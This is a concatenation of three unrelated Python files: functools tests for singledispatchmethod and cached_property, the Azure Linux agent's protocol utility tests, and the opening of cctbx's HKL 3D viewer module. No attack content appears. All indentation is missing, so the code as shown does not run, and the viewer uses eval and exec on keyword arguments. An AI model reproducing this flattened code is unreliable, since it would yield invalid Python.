self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
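# Fixtures for TestCachedProperty below: they exercise plain caching guarded
# by a lock, caching under a different attribute name, a thread-synchronised
# variant, and the unsupported __slots__ case.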
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
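# cache the result under an attribute name that differs from the wrapped
# function's name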
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with support.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
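# binding the same cached_property object under a second name makes
# __set_name__ fire again with a different name, which raises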
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
test_protocol_util.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import tempfile
import unittest
from errno import ENOENT
from threading import Thread
from azurelinuxagent.common.exception import ProtocolError, DhcpError, OSUtilError
from azurelinuxagent.common.protocol.goal_state import TRANSPORT_CERT_FILE_NAME, TRANSPORT_PRV_FILE_NAME
from azurelinuxagent.common.protocol.metadata_server_migration_util import _METADATA_PROTOCOL_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME, \
_LEGACY_METADATA_SERVER_P7B_FILE_NAME
from azurelinuxagent.common.protocol.util import get_protocol_util, ProtocolUtil, PROTOCOL_FILE_NAME, \
WIRE_PROTOCOL_NAME, ENDPOINT_FILE_NAME
from azurelinuxagent.common.utils.restutil import KNOWN_WIRESERVER_IP
from tests.tools import AgentTestCase, MagicMock, Mock, patch, clear_singleton_instances
@patch("time.sleep")
class TestProtocolUtil(AgentTestCase):
MDS_CERTIFICATES = [_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME, \
_LEGACY_METADATA_SERVER_P7B_FILE_NAME]
WIRESERVER_CERTIFICATES = [TRANSPORT_CERT_FILE_NAME, TRANSPORT_PRV_FILE_NAME]
def setUp(self):
super(TestProtocolUtil, self).setUp()
# Since ProtocolUtil is a singleton per thread, we need to clear it to ensure that the test cases do not
# reuse a previous state
clear_singleton_instances(ProtocolUtil)
# Cleanup certificate files, protocol file, and endpoint files
def tearDown(self):
dir = tempfile.gettempdir() # pylint: disable=redefined-builtin
for path in [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]:
if os.path.exists(path):
os.remove(path)
for path in [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]:
if os.path.exists(path):
os.remove(path)
protocol_path = os.path.join(dir, PROTOCOL_FILE_NAME)
if os.path.exists(protocol_path):
os.remove(protocol_path)
endpoint_path = os.path.join(dir, ENDPOINT_FILE_NAME)
if os.path.exists(endpoint_path):
os.remove(endpoint_path)
def test_get_protocol_util_should_return_same_object_for_same_thread(self, _):
protocol_util1 = get_protocol_util()
protocol_util2 = get_protocol_util()
self.assertEqual(protocol_util1, protocol_util2)
def test_get_protocol_util_should_return_different_object_for_different_thread(self, _):
protocol_util_instances = []
errors = []
def get_protocol_util_instance():
try:
protocol_util_instances.append(get_protocol_util())
except Exception as e: # pylint: disable=invalid-name
errors.append(e)
t1 = Thread(target=get_protocol_util_instance) # pylint: disable=invalid-name
t2 = Thread(target=get_protocol_util_instance) # pylint: disable=invalid-name
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(len(protocol_util_instances), 2, "Could not create the expected number of protocols. Errors: [{0}]".format(errors))
self.assertNotEqual(protocol_util_instances[0], protocol_util_instances[1], "The instances created by different threads should be different")
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_detect_protocol(self, WireProtocol, _): # pylint: disable=invalid-name
WireProtocol.return_value = MagicMock()
protocol_util = get_protocol_util()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = "foo.bar"
# Test wire protocol is available
protocol = protocol_util.get_protocol()
self.assertEqual(WireProtocol.return_value, protocol)
# Test wire protocol is not available
protocol_util.clear_protocol()
WireProtocol.return_value.detect.side_effect = ProtocolError()
self.assertRaises(ProtocolError, protocol_util.get_protocol)
@patch("azurelinuxagent.common.conf.get_lib_dir")
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_detect_protocol_no_dhcp(self, WireProtocol, mock_get_lib_dir, _): # pylint: disable=invalid-name
WireProtocol.return_value.detect = Mock()
mock_get_lib_dir.return_value = self.tmp_dir
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
protocol_util.osutil.is_dhcp_available.return_value = False
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = None
protocol_util.dhcp_handler.run = Mock()
endpoint_file = protocol_util._get_wireserver_endpoint_file_path() # pylint: disable=unused-variable,protected-access
# Test wire protocol when no endpoint file has been written
protocol_util._detect_protocol() # pylint: disable=protected-access
self.assertEqual(KNOWN_WIRESERVER_IP, protocol_util.get_wireserver_endpoint())
# Test wire protocol on dhcp failure
protocol_util.osutil.is_dhcp_available.return_value = True
protocol_util.dhcp_handler.run.side_effect = DhcpError()
self.assertRaises(ProtocolError, protocol_util._detect_protocol) # pylint: disable=protected-access
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_get_protocol(self, WireProtocol, _): # pylint: disable=invalid-name
WireProtocol.return_value = MagicMock()
protocol_util = get_protocol_util()
protocol_util.get_wireserver_endpoint = Mock()
protocol_util._detect_protocol = MagicMock() # pylint: disable=protected-access
protocol_util._save_protocol("WireProtocol") # pylint: disable=protected-access
protocol = protocol_util.get_protocol()
self.assertEqual(WireProtocol.return_value, protocol)
protocol_util.get_wireserver_endpoint.assert_any_call()
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
def test_get_protocol_wireserver_to_wireserver_update_removes_metadataserver_artifacts(self, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that an agent upgrade from WireServer to WireServer protocol
cleans up MDS certificates left over from a previous Metadata Server to WireServer
update (the intermediate updated agent does not clean them up) and resets the firewall rules.
We don't test that WireServer certificates, protocol file, or endpoint file were created
because we already expect them to be created since we are updating from a WireServer agent.
"""
# Setup Protocol file with WireProtocol
dir = tempfile.gettempdir() # pylint: disable=redefined-builtin
filename = os.path.join(dir, PROTOCOL_FILE_NAME)
with open(filename, "w") as f: # pylint: disable=invalid-name
f.write(WIRE_PROTOCOL_NAME)
# Setup MDS Certificates
mds_cert_paths = [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]
for mds_cert_path in mds_cert_paths:
open(mds_cert_path, "w").close()
# Setup mocks
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check MDS Certs do not exist
for mds_cert_path in mds_cert_paths:
self.assertFalse(os.path.exists(mds_cert_path))
# Check firewall rules were reset
protocol_util.osutil.remove_firewall.assert_called_once()
protocol_util.osutil.enable_firewall.assert_called_once()
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
@patch('azurelinuxagent.common.protocol.wire.WireClient')
def test_get_protocol_metadataserver_to_wireserver_update_removes_metadataserver_artifacts(self, mock_wire_client, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that an agent upgrade from MetadataServer to WireServer protocol
cleans up leftover MDS certificates and resets the firewall rules. Also check that
WireServer certificates are present, and that the protocol/endpoint files are written appropriately.
"""
# Setup Protocol file with MetadataProtocol
dir = tempfile.gettempdir() # pylint: disable=redefined-builtin
protocol_filename = os.path.join(dir, PROTOCOL_FILE_NAME)
with open(protocol_filename, "w") as f: # pylint: disable=invalid-name
f.write(_METADATA_PROTOCOL_NAME)
# Setup MDS Certificates
mds_cert_paths = [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]
for mds_cert_path in mds_cert_paths:
open(mds_cert_path, "w").close()
# Setup mocks
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
mock_wire_client.return_value = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check MDS Certs do not exist
for mds_cert_path in mds_cert_paths:
self.assertFalse(os.path.exists(mds_cert_path))
# Check that WireServer Certs exist
ws_cert_paths = [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]
for ws_cert_path in ws_cert_paths:
self.assertTrue(os.path.isfile(ws_cert_path))
# Check firewall rules were reset
protocol_util.osutil.remove_firewall.assert_called_once()
protocol_util.osutil.enable_firewall.assert_called_once()
# Check Protocol File is updated to WireProtocol
with open(os.path.join(dir, PROTOCOL_FILE_NAME), "r") as f: # pylint: disable=invalid-name
self.assertEqual(f.read(), WIRE_PROTOCOL_NAME)
# Check Endpoint file is updated to WireServer IP
with open(os.path.join(dir, ENDPOINT_FILE_NAME), 'r') as f: # pylint: disable=invalid-name
self.assertEqual(f.read(), KNOWN_WIRESERVER_IP)
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
@patch('azurelinuxagent.common.protocol.wire.WireClient')
def test_get_protocol_new_wireserver_agent_generates_certificates(self, mock_wire_client, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that a new WireServer Linux Agent generates appropriate certificates,
protocol file, and endpoint file.
"""
# Setup mocks
dir = tempfile.gettempdir() # pylint: disable=redefined-builtin
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
mock_wire_client.return_value = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check that WireServer Certs exist
ws_cert_paths = [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]
for ws_cert_path in ws_cert_paths:
self.assertTrue(os.path.isfile(ws_cert_path))
# Check firewall rules were not reset
protocol_util.osutil.remove_firewall.assert_not_called()
protocol_util.osutil.enable_firewall.assert_not_called()
# Check Protocol File is updated to WireProtocol
with open(os.path.join(dir, PROTOCOL_FILE_NAME), "r") as f: # pylint: disable=invalid-name
self.assertEqual(f.read(), WIRE_PROTOCOL_NAME)
# Check Endpoint file is updated to WireServer IP
with open(os.path.join(dir, ENDPOINT_FILE_NAME), 'r') as f: # pylint: disable=invalid-name
self.assertEqual(f.read(), KNOWN_WIRESERVER_IP)
@patch("azurelinuxagent.common.protocol.util.fileutil")
@patch("azurelinuxagent.common.conf.get_lib_dir")
def test_endpoint_file_states(self, mock_get_lib_dir, mock_fileutil, _):
mock_get_lib_dir.return_value = self.tmp_dir
protocol_util = get_protocol_util()
endpoint_file = protocol_util._get_wireserver_endpoint_file_path() # pylint: disable=protected-access
# Test get endpoint for io error
mock_fileutil.read_file.side_effect = IOError()
ep = protocol_util.get_wireserver_endpoint() # pylint: disable=invalid-name
self.assertEqual(ep, KNOWN_WIRESERVER_IP)
# Test get endpoint when file not found
mock_fileutil.read_file.side_effect = IOError(ENOENT, 'File not found')
ep = protocol_util.get_wireserver_endpoint() # pylint: disable=invalid-name
self.assertEqual(ep, KNOWN_WIRESERVER_IP)
# Test get endpoint for empty file
mock_fileutil.read_file.return_value = ""
ep = protocol_util.get_wireserver_endpoint() # pylint: disable=invalid-name
self.assertEqual(ep, KNOWN_WIRESERVER_IP)
# Test set endpoint for io error
mock_fileutil.write_file.side_effect = IOError()
ep = protocol_util.get_wireserver_endpoint() # pylint: disable=invalid-name
self.assertRaises(OSUtilError, protocol_util._set_wireserver_endpoint, 'abc') # pylint: disable=protected-access
# Test clear endpoint for io error
with open(endpoint_file, "w+") as ep_fd:
ep_fd.write("")
with patch('os.remove') as mock_remove:
protocol_util._clear_wireserver_endpoint() # pylint: disable=protected-access
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(endpoint_file, mock_remove.call_args_list[0][0][0])
# Test clear endpoint when file not found
with patch('os.remove') as mock_remove:
mock_remove.side_effect = IOError(ENOENT, 'File not found')
protocol_util._clear_wireserver_endpoint() # pylint: disable=protected-access
mock_remove.assert_called_once() # the ENOENT error is swallowed, not propagated
def test_protocol_file_states(self, _):
protocol_util = get_protocol_util()
protocol_util._clear_wireserver_endpoint = Mock() # pylint: disable=protected-access
protocol_file = protocol_util._get_protocol_file_path() # pylint: disable=protected-access
# Test clear protocol for io error
with open(protocol_file, "w+") as proto_fd:
proto_fd.write("")
with patch('os.remove') as mock_remove:
protocol_util.clear_protocol()
self.assertEqual(1, protocol_util._clear_wireserver_endpoint.call_count) # pylint: disable=protected-access
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(protocol_file, mock_remove.call_args_list[0][0][0])
# Test clear protocol when file not found
protocol_util._clear_wireserver_endpoint.reset_mock() # pylint: disable=protected-access
with patch('os.remove') as mock_remove:
protocol_util.clear_protocol()
self.assertEqual(1, protocol_util._clear_wireserver_endpoint.call_count) # pylint: disable=protected-access
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(protocol_file, mock_remove.call_args_list[0][0][0])
if __name__ == '__main__':
unittest.main()
|
jsview_3d.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from libtbx.math_utils import roundoff
import traceback
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from cctbx import miller, sgtbx
from scitbx import graphics_utils
from scitbx import matrix
import scitbx.math
from libtbx.utils import Sorry, to_str
import threading, math, sys, cmath
if sys.version_info[0] > 2: # using websockets which is superior to websocket_server
from crys3d.hklviewer.WebBrowserMessengerPy3 import WBmessenger
else: # using websocket_server
from crys3d.hklviewer.WebBrowserMessengerPy2 import WBmessenger
import os.path, time, copy
import libtbx
import libtbx.load_env
import webbrowser, tempfile
from six.moves import range
def has_phil_path(philobj, *paths): # variable number of arguments
for path in paths:
if len([ e.path for e in philobj.all_definitions() if path in e.path.split(".") ]):
return True
return False
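# Illustrative sketch (diff_phil here is a hypothetical phil object):
# has_phil_path(diff_phil, "nbins", "binner_idx") returns True as soon as any
# definition path in the phil object contains one of the given names as a
# dotted component.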
def MakeHKLscene( proc_array, pidx, setts, mapcoef_fom_dict, merge, mprint=sys.stdout.write):
"""
Compute the hklscene for the miller array, proc_array. If it is a complex array and there is a FOM
array among the list of miller arrays, then also compute an hklscene with the colour of each hkl
attenuated by the corresponding FOM value.
"""
from iotbx.gui_tools.reflections import ArrayInfo
scenemaxdata =[]
scenemindata =[]
scenemaxsigmas = []
sceneminsigmas = []
scenearrayinfos = []
hklscenes = []
fomsarrays_idx = [(None, None)]
if proc_array.is_complex_array():
fomsarrays_idx.extend( mapcoef_fom_dict.get(proc_array.info().label_string()) )
settings = setts
if (settings.expand_anomalous or settings.expand_to_p1) \
and not proc_array.is_unique_set_under_symmetry() and not merge:
settings.expand_anomalous = False
settings.expand_to_p1 = False
mprint("Alert! The " + proc_array.info().label_string() + \
" array is not symmetry unique and therefore won't be expanded crystallographically.")
if (settings.inbrowser==True):
settings.expand_anomalous = False
settings.expand_to_p1 = False
for (fomsarray, fidx) in fomsarrays_idx:
hklscene = display.scene(miller_array=proc_array, merge=merge,
settings=settings, foms_array=fomsarray, fullprocessarray=True, mprint=mprint)
if not hklscene.SceneCreated:
mprint("The " + proc_array.info().label_string() + " array was not processed")
break
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# replace any NaN colour components with 1.0 and NaN radii with 0.2 before writing javascript
if hklscene.SceneCreated:
hklscenes.append( hklscene)
hklscene.colors = graphics_utils.NoNansvec3( hklscene.colors, 1.0, 1.0, 1.0)
hklscene.radii = graphics_utils.NoNansArray( hklscene.radii, 0.2)
fomslabel = None
if fomsarray:
fomslabel = fomsarray.info().label_string()
arrayinfo = ArrayInfo(hklscene.work_array)
scenemindata.append(arrayinfo.minmaxdata[0])
scenemaxdata.append(arrayinfo.minmaxdata[1])
sceneminsigmas.append(arrayinfo.minmaxsigs[0])
scenemaxsigmas.append(arrayinfo.minmaxsigs[1])
lbl = arrayinfo.labelstr
hassigmas=True
if math.isnan(arrayinfo.maxsigmas):
hassigmas=False
if fomslabel:
lbl = arrayinfo.labelstr + " + " + fomslabel
(dummy1, infolst, dummy2, dummy3), dummy4, dummy5 = arrayinfo.get_selected_info_columns_from_phil()
scenearrayinfos.append([infolst, pidx, fidx, lbl, infolst[1], hassigmas])
return (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas, scenearrayinfos)
class hklview_3d:
def __init__ (self, *args, **kwds) :
self.settings = kwds.get("settings")
self.ngl_settings = None #NGLsettings()
self.viewerparams = kwds.get("settings")
self.diff_phil = None
self.params = None
self.miller_array = None
self.symops = []
self.sg = None
self.tooltipstrings = []
self.tooltipstringsdict = {}
self.d_min = None
self.scene = None
self.lastscene_id = None
self.merge = False
self.primitivetype = "SphereBuffer"
self.url = ""
self.bin_labels_type_idxs = []
self.colour_scene_id = None
self.radii_scene_id = None
self.colours = []
self.positions = []
self.radii2 = []
self.spbufttips = []
self.rot_recip_zvec = None
self.rot_zvec = None
self.meanradius = -1
self.past = time.time()
self.orientmessage = None
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.boundingX = None
self.boundingY = None
self.boundingZ = None
self.OrigClipNear = None
self.OrigClipFar = None
self.cameratranslation = ( 0,0,0 )
#self.angle_x_svec = 0.0
#self.angle_y_svec = 0.0
self.angle_z_svec = 0.0
#self.angle_z_yzvec = 0.0
#self.angle_y_yzvec = 0.0
#self.angle_y_xyvec = 0.0
self.angle_x_xyvec = 0.0
self.vecrotmx = None
self.currentrotvec = None
self.unit_h_axis = None
self.unit_k_axis = None
self.unit_l_axis = None
self.normal_hk = None
self.normal_kl = None
self.normal_lh = None
self.isnewfile = False
self.has_new_miller_array = False
self.sleeptime = 0.01 # 0.025
self.colstraliases = ""
self.binvals = []
self.binvalsboundaries = []
self.oldnbinvalsboundaries = None
self.proc_arrays = []
self.HKLscene = []
self.HKLscenes = []
self.HKLscenedict = {}
self.HKLscenesdict = {}
self.HKLscenesMaxdata = []
self.HKLscenesMindata = []
self.HKLscenesMaxsigmas = []
self.HKLscenesMinsigmas = []
self.bindata = None
self.reciproc_scale = 1.0
self.realspace_scale = 1.0
self.visual_symHKLs = []
self.visual_symmxs= []
self.sceneisdirty = True
self.imagename = None
self.imgdatastr = ""
self.hkl_scenes_info = []
self.hkl_scenes_infos = []
self.match_valarrays = []
self.array_info_format_tpl = []
self.binstrs = []
self.rotation_operators = []
self.all_vectors = []
self.nuniqueval = 0
self.bin_infotpls = []
self.mapcoef_fom_dict = {}
# colourmap=brg, colourpower=1, powerscale=1, radiiscale=1
self.datatypedefault = ["brg", 1.0, 1.0, 1.0]
self.datatypedict = { }
self.sceneid_from_arrayid = []
self.parent = None
if 'parent' in kwds:
self.parent = kwds['parent']
self.verbose = 0
if 'verbose' in kwds:
self.verbose = eval(kwds['verbose'])
self.debug = None
if 'debug' in kwds:
self.debug = kwds['debug']
self.mprint = sys.stdout.write
if 'mprint' in kwds:
self.mprint = kwds['mprint']
self.nbinvalsboundaries = 0
self.websockport = 7894
if 'websockport' in kwds:
self.websockport = kwds['websockport']
tempdir = tempfile.gettempdir()
# ensure unique file name by including port number in filename
self.hklfname = os.path.join(tempdir, "hkl_%d.htm" %self.websockport )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if 'htmlfname' in kwds and kwds['htmlfname']:
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.isHKLviewer= "false"
self.send_info_to_gui = None
if 'send_info_to_gui' in kwds:
self.send_info_to_gui = kwds['send_info_to_gui']
self.isHKLviewer= "true"
if 'fileinfo' in kwds:
return
self.mprint('Rendering done via websocket in \"%s\"' %self.hklfname)
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta charset="utf-8" /></head>
<body>
<script>var isHKLviewer = %s; </script>
<script>var websocket_portnumber = %s; </script>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
<div id="viewport" style="width:100%%; height:100%%;"></div>
</body></html>
"""
Html2Canvaslibpath = libtbx.env.under_dist("crys3d","hklviewer/html2canvas.min.js")
#Threejslibpath = libtbx.env.under_dist("crys3d","hklviewer/three.js")
NGLlibpath = libtbx.env.under_dist("crys3d","hklviewer/ngl.js")
HKLjscriptpath = libtbx.env.under_dist("crys3d","hklviewer/HKLJavaScripts.js")
HKLjscriptpath = os.path.abspath( HKLjscriptpath)
Html2Canvasliburl = "file:///" + Html2Canvaslibpath.replace("\\","/")
#Threejsliburl = "file:///" + Threejslibpath.replace("\\","/")
NGLliburl = "file:///" + NGLlibpath.replace("\\","/")
HKLjscripturl = "file:///" + HKLjscriptpath.replace("\\","/")
self.htmlstr = self.hklhtml %(self.isHKLviewer, self.websockport, Html2Canvasliburl,
NGLliburl, HKLjscripturl)
self.colourgradientvalues = []
self.UseOSBrowser = ""
if 'useGuiSocket' not in kwds:
self.UseOSBrowser = "default"
ldic=locals()
if 'UseOSBrowser' in kwds:
exec("UseOSBrowser = kwds['UseOSBrowser']", globals(), ldic)
self.UseOSBrowser = ldic["UseOSBrowser"]
self.UseOSBrowser = self.UseOSBrowser.replace("\\","/")
self.viewmtrx = None
self.lastviewmtrx = None
self.currentRotmx = matrix.identity(3)
self.HKLsceneKey = ( 0, False, self.viewerparams.expand_anomalous, self.viewerparams.expand_to_p1 )
self.handshakewait = 5
if 'handshakewait' in kwds:
self.handshakewait = eval(kwds['handshakewait'])
self.lastmsg = "" # "Ready"
self.boundingbox_msg_sem = threading.Semaphore()
self.clipplane_msg_sem = threading.Semaphore()
self.mousespeed_msg_sem = threading.Semaphore()
self.WBmessenger = WBmessenger(self)
self.AddToBrowserMsgQueue = self.WBmessenger.AddToBrowserMsgQueue
self.WBmessenger.StartWebsocket()
self.javascriptcleaned = False
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.JavaScriptCleanUp()
self.SendInfoToGUI( { "datatype_dict": self.datatypedict } ) # so the GUI can persist these across sessions
nwait = 0
if self.viewerparams.scene_id is None:
self.WBmessenger.StopWebsocket()
while not self.WBmessenger.isterminating and nwait < 5:
time.sleep(self.sleeptime)
nwait += self.sleeptime
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
self.mprint("Destroying hklview_3d", 1)
def SendInfoToGUI(self, mydict):
if self.send_info_to_gui:
self.send_info_to_gui( mydict )
def update_settings(self, diff_phil, curphilparam) :
"""
Event handler for zmq messages from the GUI, or for command-line interaction when
scripting HKLviewer with Python.
"""
self.ngl_settings = curphilparam.NGL
self.viewerparams = curphilparam.viewer
self.params = curphilparam
self.diff_phil = diff_phil
if has_phil_path(diff_phil,
"openfilename",
"use_provided_miller_arrays",
"spacegroup_choice",
"using_space_subgroup",
"merge_data",
"camera_type",
"miller_array_operations",
) \
or has_phil_path(diff_phil, "viewer") \
